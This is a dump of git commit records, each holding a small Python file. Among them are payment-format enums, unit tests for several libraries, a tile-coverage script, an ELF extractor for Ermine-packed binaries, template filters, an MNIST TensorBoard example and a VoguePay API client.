commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
f2f4accf304cfe1aaed042f7df35bc0ee86a6c59 | Add enums for service/record/assignment/transaction type | netsgiro/enums.py | netsgiro/enums.py | from enum import IntEnum
class ServiceType(IntEnum):
    """Service type codes: none, OCR Giro, or AvtaleGiro."""
    NONE = 0
    OCR_GIRO = 9
    AVTALEGIRO = 21
class RecordType(IntEnum):
    """Record type codes found in OCR Giro / AvtaleGiro files."""
    TRANSMISSION_START = 10
    ASSIGNMENT_START = 20
    TRANSACTION_AMOUNT_1 = 30
    TRANSACTION_AMOUNT_2 = 31
    TRANSACTION_AMOUNT_3 = 32  # Only for TransactionType 20 and 21
    TRANSACTION_SPECIFICATION = 49
    AGREEMENTS = 78  # TODO Better name?
    ASSIGNMENT_END = 88
    TRANSMISSION_END = 89
class AvtaleGiroAssignmentType(IntEnum):
    """Assignment type codes for AvtaleGiro assignments."""
    PAYMENT_REQUEST = 0  # TODO Better name?
    AGREEMENTS = 24  # TODO Better name?
    CANCELATION = 36  # TODO Better name?
class AvtaleGiroTransactionType(IntEnum):
    """Transaction type codes for AvtaleGiro transactions."""
    NO_NOTIFICATION_FROM_BANK = 2  # TODO Better name?
    NOTIFICATION_FROM_BANK = 21  # TODO Better name?
    CANCELATION = 93  # TODO Better name?
    AGREEMENTS = 94  # TODO Better name?
class OcrGiroTransactionType(IntEnum):
    """Transaction type codes describing how an OCR Giro payment was made."""
    FROM_GIRO_DEBITED_ACCOUNT = 10
    FROM_STANDING_ORDERS = 11
    FROM_DIRECT_REMITTANCE = 12
    FROM_BUSINESS_TERMINAL_GIRO = 13
    FROM_COUNTER_GIRO = 14
    FROM_AVTALEGIRO = 15
    FROM_TELEGIRO = 16
    FROM_CASH_GIRO = 17
    REVERSING_WITH_KID = 18
    PURCHASE_WITH_KID = 19
    REVERSING_WITH_TEXT = 20
    PURCHASE_WITH_TEXT = 21
| Python | 0.000001 | |
ca16e36b79e9c7dcd5cb31d899ef9c50ebf602c1 | add unit test for _nearest_neighbor() | urbanaccess/tests/test_network.py | urbanaccess/tests/test_network.py | import pytest
import pandas as pd
from urbanaccess import network
@pytest.fixture
def nearest_neighbor_dfs():
    # Three OSM nodes, indexed by integer id.
    data = {
        'id': (1, 2, 3),
        'x': [-122.267546, -122.264479, -122.219119],
        'y': [37.802919, 37.808042, 37.782288]
    }
    osm_nodes = pd.DataFrame(data).set_index('id')
    # Four transit stops, indexed by a route-qualified node id.
    data = {
        'node_id_route': ['1_transit_a', '2_transit_a',
                          '3_transit_a', '4_transit_a'],
        'x': [-122.265417, -122.266910, -122.269741, -122.238638],
        'y': [37.806372, 37.802687, 37.799480, 37.797234]
    }
    transit_nodes = pd.DataFrame(data).set_index('node_id_route')
    # Hand-computed nearest OSM node id for each transit stop.
    data = {'node_id_route': ['1_transit_a', '2_transit_a',
                              '3_transit_a', '4_transit_a'],
            'nearest_osm_node': [2, 1, 1, 3]}
    index = range(4)
    expected_transit_nodes = pd.concat(
        [transit_nodes, pd.DataFrame(data, index).set_index('node_id_route')],
        axis=1)
    return osm_nodes, transit_nodes, expected_transit_nodes
def test_nearest_neighbor(nearest_neighbor_dfs):
    # _nearest_neighbor should map each transit stop to the id of the
    # closest OSM node; expected ids are hard-coded in the fixture.
    osm_nodes, transit_nodes, expected_transit_nodes = nearest_neighbor_dfs
    transit_nodes['nearest_osm_node'] = network._nearest_neighbor(
        osm_nodes[['x', 'y']],
        transit_nodes[['x', 'y']])
    assert expected_transit_nodes.equals(transit_nodes)
| Python | 0.000002 | |
7c5dbbcd1de6376a025117fe8f00516f2fcbb40d | Add regressiontest for crypto_onetimeauth_verify | tests/unit/test_auth_verify.py | tests/unit/test_auth_verify.py | # Import nacl libs
import libnacl
# Import python libs
import unittest
class TestAuthVerify(unittest.TestCase):
    '''
    Round-trip and failure tests for crypto_auth and crypto_onetimeauth.
    '''
    def test_auth_verify(self):
        '''
        Test auth functions
        '''
        msg = b'Anybody can invent a cryptosystem he cannot break himself. Except Bruce Schneier.'
        key1 = libnacl.utils.rand_nonce()
        key2 = libnacl.utils.rand_nonce()
        sig1 = libnacl.crypto_auth(msg, key1)
        sig2 = libnacl.crypto_auth(msg, key2)
        self.assertTrue(libnacl.crypto_auth_verify(sig1, msg, key1))
        # Verifying with the wrong key must raise.  Compare against the
        # exception's *text*: the old `'...' in context.exception` applied
        # `in` to the exception object itself, which raises TypeError and
        # never actually checked the message.
        with self.assertRaises(ValueError) as context:
            libnacl.crypto_auth_verify(sig1, msg, key2)
        self.assertIn('Failed to auth msg', str(context.exception))
        with self.assertRaises(ValueError) as context:
            libnacl.crypto_auth_verify(sig2, msg, key1)
        self.assertIn('Failed to auth msg', str(context.exception))
        self.assertTrue(libnacl.crypto_auth_verify(sig2, msg, key2))
    def test_onetimeauth_verify(self):
        '''
        Test onetimeauth functions
        '''
        msg = b'Anybody can invent a cryptosystem he cannot break himself. Except Bruce Schneier.'
        key1 = libnacl.utils.rand_nonce()
        key2 = libnacl.utils.rand_nonce()
        sig1 = libnacl.crypto_onetimeauth(msg, key1)
        sig2 = libnacl.crypto_onetimeauth(msg, key2)
        self.assertTrue(libnacl.crypto_onetimeauth_verify(sig1, msg, key1))
        with self.assertRaises(ValueError) as context:
            libnacl.crypto_onetimeauth_verify(sig1, msg, key2)
        self.assertIn('Failed to auth msg', str(context.exception))
        with self.assertRaises(ValueError) as context:
            libnacl.crypto_onetimeauth_verify(sig2, msg, key1)
        self.assertIn('Failed to auth msg', str(context.exception))
        self.assertTrue(libnacl.crypto_onetimeauth_verify(sig2, msg, key2))
| Python | 0.004908 | |
80ccffb269b04af02224c1121c41d4e7c503bc30 | Add unit test for intersperse | tests/util/test_intersperse.py | tests/util/test_intersperse.py | # This file is part of rinohtype, the Python document preparation system.
#
# Copyright (c) Brecht Machiels.
#
# Use of this source code is subject to the terms of the GNU Affero General
# Public License v3. See the LICENSE file or http://www.gnu.org/licenses/.
from rinoh.util import intersperse
def test_intersperse():
    # intersperse yields the separator between consecutive items,
    # like str.join but for arbitrary iterables.
    separator = "."
    letters = [127, 0, 0, 1]
    localhost = list(intersperse(letters, separator))
    assert [127, ".", 0, ".", 0, ".", 1] == localhost
| Python | 0.000001 | |
8f18a1b75b68d8c97efd57673b160a9ceda608a3 | Add Manifest class | manifest.py | manifest.py | __author__ = 'fervent'
| Python | 0 | |
e56d9337cc5c63ef61afe8ffdee2019e19af0963 | Add test for resolved issue 184 | test/test_issue184.py | test/test_issue184.py | from rdflib.term import Literal
from rdflib.term import URIRef
from rdflib.graph import ConjunctiveGraph
def test_escaping_of_triple_doublequotes():
    """
    Issue 186 - Check escaping of multiple doublequotes.
    A serialization/deserialization roundtrip of a certain class of
    Literals fails when there are both, newline characters and multiple subsequent
    quotation marks in the lexical form of the Literal. In this case invalid N3
    is emitted by the serializer, which in turn cannot be parsed correctly.
    """
    # NOTE(review): docstring says issue 186 but this module targets issue
    # 184 -- confirm which tracker entry this regression test belongs to.
    g=ConjunctiveGraph()
    g.add((URIRef('http://foobar'), URIRef('http://fooprop'), Literal('abc\ndef"""""')))
    # assert g.serialize(format='n3') == '@prefix ns1: <http:// .\n\nns1:foobar ns1:fooprop """abc\ndef\\"\\"\\"\\"\\"""" .\n\n'
    g2=ConjunctiveGraph()
    g2.parse(data=g.serialize(format='n3'), format='n3')
    assert g.isomorphic(g2) is True
0988a2a18688a8b8e07d94e1609405c17bbe717d | Add test suite for the playlist plugin | test/test_playlist.py | test/test_playlist.py | # -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Thomas Scholtes.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import division, absolute_import, print_function
import os
import tempfile
import unittest
from test import _common
from test import helper
import beets
class PlaylistTest(unittest.TestCase, helper.TestHelper):
    def setUp(self):
        # In-memory beets library populated with three items/albums at
        # fixed, platform-normalized paths.
        self.setup_beets()
        self.lib = beets.library.Library(':memory:')
        i1 = _common.item()
        i1.path = beets.util.normpath('/a/b/c.mp3')
        i1.title = u'some item'
        i1.album = u'some album'
        self.lib.add(i1)
        self.lib.add_album([i1])
        i2 = _common.item()
        i2.path = beets.util.normpath('/d/e/f.mp3')
        i2.title = 'another item'
        i2.album = 'another album'
        self.lib.add(i2)
        self.lib.add_album([i2])
        i3 = _common.item()
        i3.path = beets.util.normpath('/x/y/z.mp3')
        i3.title = 'yet another item'
        i3.album = 'yet another album'
        self.lib.add(i3)
        self.lib.add_album([i3])
        # The playlist file lists only the first two items, so playlist
        # queries must exclude i3.
        self.playlist_dir = tempfile.TemporaryDirectory()
        with open(os.path.join(self.playlist_dir.name, 'test.m3u'), 'w') as f:
            f.write('{0}\n'.format(beets.util.displayable_path(i1.path)))
            f.write('{0}\n'.format(beets.util.displayable_path(i2.path)))
        self.config['directory'] = '/'
        self.config['playlist']['relative_to'] = 'library'
        self.config['playlist']['playlist_dir'] = self.playlist_dir.name
        self.load_plugins('playlist')
    def tearDown(self):
        self.unload_plugins()
        self.playlist_dir.cleanup()
        self.teardown_beets()
    def test_query_name(self):
        # Query by playlist basename (without the .m3u extension).
        q = u'playlist:test'
        results = self.lib.items(q)
        self.assertEqual(set([i.title for i in results]), set([
            u'some item',
            u'another item',
        ]))
    def test_query_path(self):
        # Query by the playlist's absolute file path.
        q = u'playlist:{0}/test.m3u'.format(self.playlist_dir.name)
        results = self.lib.items(q)
        self.assertEqual(set([i.title for i in results]), set([
            u'some item',
            u'another item',
        ]))
def suite():
    """Build a TestSuite containing every test defined in this module."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| Python | 0 | |
71577ec62406c0119ea2282a3011ebbc368a3a04 | add test_pollbot.py | tests/test_pollbot.py | tests/test_pollbot.py | #!/usr/bin/env python3
import pytest
import poll_bot
class TestPollBot:
    def test_extract_emoji(self):
        # extract_emoji should return the leading vote token of each poll
        # line: a plain character, a unicode emoji, a regional-indicator
        # flag pair, or a custom Discord emoji of the form <:name:id>.
        lines_and_emojis = {
            ' M)-ystery meat': 'M',
            '🐕 dog sandwiches': '🐕',
            '3 blind mice': '3',
            '🇺🇸 flags': '🇺🇸',
            '<:python3:232720527448342530> python3!': '<:python3:232720527448342530>',
        }
        for input, output in lines_and_emojis.items():
            assert poll_bot.extract_emoji(input) == output
1e9980aff2370b96171011f7fa50d4517957fa86 | Add a script to check TOI coverage for a bbox and zoom range | tilepack/check_toi.py | tilepack/check_toi.py | import mercantile
import argparse
def main():
    # Compare the tiles covering a bounding box (the AOI) against the
    # per-zoom TOI dumps (toi.z<zoom>.txt, one "z/x/y" per line) and report
    # how many AOI tiles are missing from each TOI.
    parser = argparse.ArgumentParser()
    parser.add_argument('min_lon',
        type=float,
        help='Bounding box minimum longitude/left')
    parser.add_argument('min_lat',
        type=float,
        help='Bounding box minimum latitude/bottom')
    parser.add_argument('max_lon',
        type=float,
        help='Bounding box maximum longitude/right')
    parser.add_argument('max_lat',
        type=float,
        help='Bounding box maximum latitude/top')
    parser.add_argument('min_zoom',
        type=int,
        help='The minimum zoom level to include')
    parser.add_argument('max_zoom',
        type=int,
        help='The maximum zoom level to include')
    args = parser.parse_args()
    print("zoom\tmissing from toi\tin aoi")
    for zoom in range(args.min_zoom, args.max_zoom + 1):
        # All tiles at this zoom intersecting the bounding box.
        tiles_in_aoi = set([
            '{}/{}/{}'.format(z, x, y)
            for x, y, z in mercantile.tiles(
                args.min_lon, args.min_lat, args.max_lon, args.max_lat,
                [zoom]
            )
        ])
        with open('toi.z{}.txt'.format(zoom), 'r') as f:
            tiles_in_toi = set([
                l.strip()
                for l in f.readlines()
            ])
        print("{zoom:2d}\t{tiles_not_in_toi}\t{tiles_in_aoi}".format(
            zoom=zoom,
            tiles_not_in_toi=len(tiles_in_aoi - tiles_in_toi),
            tiles_in_aoi=len(tiles_in_aoi),
        ))
if __name__ == '__main__':
main()
| Python | 0 | |
17654378a6039203ead1c711b6bb8f7fb3ad8680 | add Ermine ELF dumper. | tools/dump-ermine-elfs.py | tools/dump-ermine-elfs.py | #!/usr/bin/env python
#
# Copyright (C) 2013 Mikkel Krautz <mikkel@krautz.dk>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the Mumble Developers nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# `AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# dump-ermine-elfs.py is a simple script that dumps all embedded
# ELFs (executables and shared libraries) contained in an Ermine
# packed ELF binary.
import os
import sys
def usage():
    # Print CLI usage and exit non-zero (Python 2 print statement).
    print 'dump-ermine-elfs.py <fn>'
    sys.exit(1)
def main():
    # Scan an Ermine-packed binary for every embedded ELF magic and write
    # each [magic .. next-magic) span out as dumped-<i>.elf.
    # NOTE(review): the file is opened in text mode 'r'/'w'; for binary
    # ELF data 'rb'/'wb' looks required on non-POSIX platforms -- confirm.
    if len(sys.argv) < 2:
        usage()
    fn = sys.argv[1]
    f = open(fn, 'r')
    all = f.read()
    f.close()
    elfMagic = '\x7fELF'
    elfPairs = []
    for i in range(0, len(all)):
        if i == 0:  # skip binary itself
            continue
        if all[i:i+len(elfMagic)] == elfMagic:
            elfPairs.append(i)
    # Sentinel: the final ELF extends to the end of the file.
    elfPairs.append(len(all))
    for i, ofs in enumerate(elfPairs):
        if i == len(elfPairs)-1:  # done?
            break
        end = elfPairs[i+1]
        fn = 'dumped-%i.elf' % i
        print 'dumping elf @ 0x%x to %s' % (ofs, fn)
        f = open(fn, 'w')
        f.write(all[ofs:end])
        f.close()
if __name__ == '__main__':
main()
| Python | 0 | |
4a1e46d279df1d0a7eaab2ba8175193cd67c1f63 | Add some template filters: sum, floatformat, addslashes, capfirst, stringformat (copied from django), dictsort, get, first, join, last, length, random, sort. Needed to write tests for all those filters | lighty/templates/templatefilters.py | lighty/templates/templatefilters.py | '''Package contains default template tags
'''
from decimal import Decimal, ROUND_DOWN
import random as random_module
from filter import filter_manager
# Numbers
def sum(*args):
    '''Calculate the sum of all the values passed as args.

    Every argument is coerced to float before adding, so numeric strings
    (the common case for template variables) work.  The old ``reduce``
    version left the first argument uncoerced, raising TypeError for
    string input.  Always returns a float.
    '''
    total = 0.0
    for value in args:
        total += float(value)
    return total
filter_manager.register(sum)
def floatformat(raw_value, format='0'):
    '''Make pretty float representation.

    Truncates (rounds toward zero) *raw_value* to ``abs(int(format))``
    decimal places.  A leading ``-`` in *format* additionally strips
    trailing zeros (and a then-dangling decimal point).

    Lets:
        a = '12.4'
    Then:
        >>> print(floatformat(a))
        12
        >>> print(floatformat(a, '2'))
        12.40
        >>> print(floatformat(a, '-2'))
        12.4
    '''
    # Parse arguments
    try:
        digits = abs(int(format))
    except (TypeError, ValueError):
        raise Exception('floatformat arguments error: format is not integer')
    try:
        value = Decimal(raw_value)
    except Exception:
        raise Exception('floatformat supports only number values')
    # Quantizer with `digits` decimal places (e.g. Decimal('0.01') for 2).
    formatter = Decimal(1).scaleb(-digits)
    # Truncate the magnitude, then restore the sign.
    result = value.copy_abs().quantize(formatter, rounding=ROUND_DOWN)
    result = str(result.copy_sign(value))
    if str(format).startswith('-') and '.' in result:
        # Only strip zeros from the fractional part: blindly rstrip'ing
        # an integer result corrupted it ('100' -> '1'), and stripping
        # '12.00' used to leave a dangling '12.'.
        result = result.rstrip('0').rstrip('.')
    return result
# Strings
def addslashes(value):
    '''Backslash-escape backslashes, double quotes and single quotes.
    '''
    escaped = value.replace('\\', '\\\\')
    escaped = escaped.replace('"', '\\"')
    return escaped.replace("'", "\\'")
filter_manager.register(addslashes)
def capfirst(value):
    '''Upper-case only the first character, leaving the rest untouched.
    '''
    if not value:
        return value
    return value[0].upper() + value[1:]
filter_manager.register(capfirst)
def stringformat(value, format):
    """Format *value* with a printf-style specifier.

    The specifier uses Python %-formatting syntax with the leading "%"
    omitted, e.g. ``stringformat(3, '03d') == '003'``.

    See http://docs.python.org/lib/typesseq-strings.html for documentation
    of Python string formatting
    """
    spec = u"%" + str(format)
    return spec % value
filter_manager.register(stringformat)
# Lists, dicts, strings
def dictsort(value, key, order=''):
    '''Sort a list of dicts by the given *key*.

    Any non-empty *order* reverses the sort.  The old version passed the
    key *name* straight to ``sorted(key=...)``, which requires a callable
    and raised TypeError; look the key up on each item instead.
    '''
    return sorted(value, key=lambda item: item[key],
                  reverse=(order != ''))
filter_manager.register(dictsort)
def get(value, index):
    '''Return the item at positional *index*, or '' when out of range.

    For dicts the index selects the index-th key (in iteration order) and
    its value is returned; for sequences it is a plain positional lookup.
    The old version tested ``index in value`` -- membership of the index
    among the *items* -- so positional lookups almost always returned ''.
    '''
    if issubclass(value.__class__, dict):
        keys = list(value.keys())
        if 0 <= index < len(keys):
            return value[keys[index]]
        return ''
    if 0 <= index < len(value):
        return value[index]
    return ''
filter_manager.register(get)
def first(value):
    '''Return the initial item of *value* (the ``get`` filter at index 0).
    '''
    return get(value, 0)
filter_manager.register(first)
def join(value, joiner):
    '''Concatenate the items of *value*, separated by *joiner*.

    >>> join([1, 2, 3], ' ')
    '1 2 3'
    '''
    parts = [str(item) for item in value]
    return joiner.join(parts)
filter_manager.register(join)
def last(value):
    '''Return the final item of *value* (the ``get`` filter at the last index).
    '''
    return get(value, len(value) - 1)
filter_manager.register(last)
def length(value):
    '''Returns the length of the string, dict or list.
    '''
    return len(value)
# Was missing: every other filter in this module registers itself.
filter_manager.register(length)
def random(value):
    '''Get a random item from the list or dict.
    '''
    # random.random() takes no arguments and always raised TypeError here;
    # randrange(n) draws a valid index 0..n-1.
    return get(value, random_module.randrange(len(value)))
filter_manager.register(random)
def sort(value):
    '''Return the items of *value* as a new list in ascending order.
    '''
    items = list(value)
    items.sort()
    return items
filter_manager.register(sort)
| Python | 0.000001 | |
654e2bf70b4a47adb53d8a0b17f0257e84c7bdf8 | read in data, check things look sensible. Note: need to change unknowns in group col so we have a more usable data type in the pandas dataframe. | main.py | main.py | # Data modelling challenge.
__author__ = 'Remus Knowles <remknowles@gmail.com>'
import pandas as pd
F_DATA = r'data challenge test.csv'
def main():
    # Load the challenge CSV and eyeball the first rows (Python 2 print).
    df = pd.read_csv(F_DATA)
    print df.head()
if __name__ == '__main__':
main() | Python | 0 | |
0046f5276c9572fbc40080cc2201a89ee37b96b2 | Create mwis.py | mwis.py | mwis.py | weights = [int(l) for l in open('mwis.txt')][1:]
def mwis(weights):
n = len(weights)
weights = [0] + weights
maxsetweight = [0, weights[1]]
for i in range(2, n + 1):
maxsetweight.append(max(maxsetweight[i - 1], maxsetweight[i - 2] + weights[i] ))
i = n
maxset = []
while i > 1:
if maxsetweight[i-2] + weights[i] > maxsetweight[i-1]:
maxset.append(i)
i -= 2
if i == 1:
maxset.append(1)
break
else:
i -= 1
return (maxsetweight[n], maxset)
a, b = mwis(weights)
print "The weight of the maximum weight independent set of the graph is :", a
print "The vertices that constitute the maximum weight independent set of the path graph are :", b
| Python | 0.000005 | |
837382f44d91a44c14884f87c580b969e5ef5a4a | add example for tensorboard | models/toyexample_03_tensorboard.py | models/toyexample_03_tensorboard.py | import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True, reshape=False, validation_size=0)
K = 200
L = 100
M = 60
N = 30
# initialization
X = tf.placeholder(tf.float32, [None, 28, 28, 1])
# placeholder for correct answers
Y_ = tf.placeholder(tf.float32, [None, 10])
W1 = tf.Variable(tf.truncated_normal([784, K], stddev=0.1))
B1 = tf.Variable(tf.zeros([K]))
W2 = tf.Variable(tf.truncated_normal([K, L], stddev=0.1))
B2 = tf.Variable(tf.zeros([L]))
W3 = tf.Variable(tf.truncated_normal([L, M], stddev=0.1))
B3 = tf.Variable(tf.zeros([M]))
W4 = tf.Variable(tf.truncated_normal([M, N], stddev=0.1))
B4 = tf.Variable(tf.zeros([N]))
W5 = tf.Variable(tf.truncated_normal([N, 10], stddev=0.1))
B5 = tf.Variable(tf.zeros([10]))
# model
XX = tf.reshape(X, [-1, 28 * 28]) # Input Layer
# summary1 = tf.summary.tensor_summary("INPUT", XX, "input of model")
with tf.name_scope("Hidden_1"):
Y1 = tf.nn.sigmoid(tf.matmul(XX, W1) + B1) # Hidden Layer 1
with tf.name_scope("Hidden_2"):
Y2 = tf.nn.sigmoid(tf.matmul(Y1, W2) + B2) # Hidden Layer 2
with tf.name_scope("Hidden_3"):
Y3 = tf.nn.sigmoid(tf.matmul(Y2, W3) + B3) # Hidden Layer 3
with tf.name_scope("Hidden_4"):
Y4 = tf.nn.sigmoid(tf.matmul(Y3, W4) + B4) # Hidden Layer 4
Ylogits = tf.matmul(Y4, W5) + B5 # Output Layer
Y = tf.nn.softmax(Ylogits)
# summary2 = tf.summary.tensor_summary("OUTPUT", Y, "output of model")
# loss function
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(Ylogits, Y_)
cross_entropy = tf.reduce_mean(cross_entropy) * 100
cost_train = tf.scalar_summary("cost_train", cross_entropy)
cost_val = tf.scalar_summary("cost_val", cross_entropy)
# % of correct answers found in batch
correct_prediction = tf.equal(tf.argmax(Y, 1), tf.argmax(Y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
acc_train = tf.scalar_summary("acc_train", accuracy)
acc_val = tf.scalar_summary("acc_val", accuracy)
# training step
learning_rate = 0.003
optimizer = tf.train.AdamOptimizer(learning_rate)
train_step = optimizer.minimize(cross_entropy)
init = tf.initialize_all_variables()
summary = tf.merge_all_summaries()
sess = tf.Session()
#### BEGIN ####
# Create a summary writer
writer = tf.train.SummaryWriter("./private/", flush_secs=1)
# add the 'graph' to the event file.
writer.add_graph(sess.graph)
# writer.add_graph(tf.get_default_graph())
#### END ####
sess.run(init)
# Train for 100k steps on mini-batches of 100; log train cost/accuracy every
# step and validation cost/accuracy every 100 steps to TensorBoard.
idx = 1;  # NOTE(review): assigned but never used -- candidate for removal
for i in range(100001):
    # Load batch of images and correct answers
    batch_X, batch_Y = mnist.train.next_batch(100)
    train_data = {X: batch_X, Y_: batch_Y}
    # train
    _, ct, at, = sess.run([train_step,cost_train,acc_train], feed_dict=train_data)
    writer.add_summary(ct, i)
    writer.add_summary(at, i)
    # success? add code to print it
    if i % 100 == 0:
        # c, ct, at = sess.run([cross_entropy, cost_train, acc_train], feed_dict=train_data)
        # print("Accuracy on train set (i = " + str(i) + "): " + str(a))
        # success on test data?
        test_data = {X: mnist.test.images, Y_: mnist.test.labels}
        a, c, cv, av = sess.run([accuracy,cross_entropy, cost_val, acc_val], feed_dict=test_data)
        writer.add_summary(cv, i)
        writer.add_summary(av, i)
        print("Accuracy on test set (i = " + str(i) + "): " + str(a))
| Python | 0 | |
572a47ab8b05f8e93ec5e1b415cb56387d4279ca | add m_restart.py | pyscf/nao/m_restart.py | pyscf/nao/m_restart.py |
#An HDF5 file is a container for two kinds of objects: datasets (array-like collections of data), and groups (folder-like containers that hold datasets).
#Groups work like dictionaries, and datasets work like NumPy arrays
def read_rst_h5py (filename=None):
    """Read the first dataset from an HDF5 restart file.

    When *filename* is omitted, the first ``*.hdf5`` file in the current
    working directory is used.  Returns ``(data, message)``.
    """
    import h5py, os, glob
    if filename is None:
        # The old code called an undefined ``find()`` helper here, which
        # raised NameError; glob the working directory instead.
        matches = glob.glob(os.path.join(os.getcwd(), '*.hdf5'))
        if not matches:
            raise IOError('no *.hdf5 restart file found in {}'.format(os.getcwd()))
        filename = matches[0]
    with h5py.File(filename, 'r') as f:
        # Read the first (and only expected) dataset, e.g. 'W_c'.
        a_group_key = list(f.keys())[0]
        data = list(f[a_group_key])
    msg = 'RESTART: Full matrix elements of screened interactions (W_c) was read from {}'.format(filename)
    return data, msg
def write_rst_h5py(data, filename = None):
    """Store *data* as dataset 'W_c' in an HDF5 restart file.

    Returns a human-readable confirmation message.
    """
    import h5py
    if filename is None:
        filename = 'SCREENED_COULOMB.hdf5'
    # The context manager closes the file on exit; the old trailing bare
    # ``data_file.close`` (no parentheses) was a no-op and was removed.
    with h5py.File(filename, 'w') as data_file:
        data_file.create_dataset('W_c', data=data)
    msg = 'Full matrix elements of screened interactions (W_c) stored in {}'.format(filename)
    return msg
def write_rst_yaml(data, filename=None):
    """Dump *data* to a YAML restart file and return a confirmation message."""
    import yaml
    if filename is None:
        filename = 'SCREENED_COULOMB.yaml'
    with open(filename, 'w+', encoding='utf8') as outfile:
        yaml.dump(data, outfile, default_flow_style=False, allow_unicode=True)
    return 'Full matrix elements of screened interactions stored in {}'.format(filename)
def read_rst_yaml (filename=None):
    """Read restart data from a YAML file.

    When *filename* is omitted, the first ``*.yaml`` file in the current
    working directory is used.  Returns ``(data, message)``; parse errors
    propagate (the old version *returned* the exception object, breaking
    the documented two-tuple contract).
    """
    import yaml, os, glob
    if filename is None:
        # The old code called an undefined ``find()`` helper (NameError);
        # glob the working directory instead.
        matches = glob.glob(os.path.join(os.getcwd(), '*.yaml'))
        if not matches:
            raise IOError('no *.yaml restart file found in {}'.format(os.getcwd()))
        filename = matches[0]
    with open(filename, 'r') as stream:
        # NOTE(review): yaml.load without an explicit Loader can execute
        # arbitrary tags; restart files are self-produced, but safe_load
        # would be stricter -- confirm.
        data = yaml.load(stream)
    msg = 'RESTART: Full matrix elements of screened interactions (W_c) was read from {}'.format(filename)
    return data, msg
| Python | 0.000026 | |
a0c303e9c1f7ac75e078e6f3ae9586ba68a24f63 | add the solution | python/oj/mergeSort.py | python/oj/mergeSort.py | #!/usr/bin/python
# coding:utf8
'''
@author: shaoyuliang
@contact: mshao@splunk.com
@since: 7/16/14
'''
# https://oj.leetcode.com/problems/merge-sorted-array/
class Solution:
    """In-place merge of two sorted integer lists (LeetCode 88)."""
    # @param A a list of integers
    # @param m an integer, length of A
    # @param B a list of integers
    # @param n an integer, length of B
    # @return nothing
    def merge(self, A, m, B, n):
        """Merge sorted B (length n) into sorted A (first m entries),
        growing A in place to m + n elements.

        Fills from the back in O(m + n), replacing the old quadratic
        pop/insert scan.
        """
        A.extend([None] * n)  # make room for B's elements
        i, j, k = m - 1, n - 1, m + n - 1
        # Writing from the back never clobbers unread values of A.
        while j >= 0:
            if i >= 0 and A[i] > B[j]:
                A[k] = A[i]
                i -= 1
            else:
                A[k] = B[j]
                j -= 1
            k -= 1
A = [1, 3, 5]
Solution().merge(A, 3, [2, 4], 2)
print A | Python | 0.000256 | |
863ec839e24f2f17ba9d1dfb1177592f34cfc5e3 | Create Transaction.py | pyvogue/Transaction.py | pyvogue/Transaction.py |
import requests
import json
import urllib
class Transaction():
    """Thin client for the VoguePay HTTP API.

    Python-2 era code: ``urllib.urlencode`` moved to ``urllib.parse`` in
    Python 3.
    """
    def getall(self,trx,res,decode_content=False):
        """
        Gets all your transactions
        args:
            trx -- the transaction id to be fetched
            res -- the response type expected : json or xml
            decode_content -- when True, parse the JSON body into a dict
                              instead of returning the raw response text
        """
        url = "https://voguepay.com/?v_transaction_id="+str(trx)+"&type="+str(res)
        if ( decode_content ):
            dec = self.__parse_json(requests.get(url).text)
            return (dec)
        else:
            return requests.get(url).text
    def paylink(self,param):
        """
        Generate a one time payment link from params
        args:
            param -- a dictionary of payment params
            e.g
            params = {'v_merchant_id':'14307-23682',
                      'memo':'testing',
                      'total':'1200'
                      }
        """
        # NOTE(review): returns the requests.Response object itself, not
        # the link text -- confirm callers expect that.
        urlg = "https://voguepay.com/?p=linkToken&"+urllib.urlencode(param)
        return requests.get(urlg)
    def __parse_json(self, response_obj):
        """
        This function takes in json response sent back by the
        server
        Returns a python dictionary of status, email, amount, memo etc
        """
        data = json.loads(response_obj)
        return data
| Python | 0.000001 | |
3ae0ea21cc6b1afadb0dd72e29016385d18167ab | Add FifoReader class to utils | DebianDevelChangesBot/utils/fiforeader.py | DebianDevelChangesBot/utils/fiforeader.py | # -*- coding: utf-8 -*-
#
# Debian Changes Bot
# Copyright (C) 2008 Chris Lamb <chris@chris-lamb.co.uk>
#
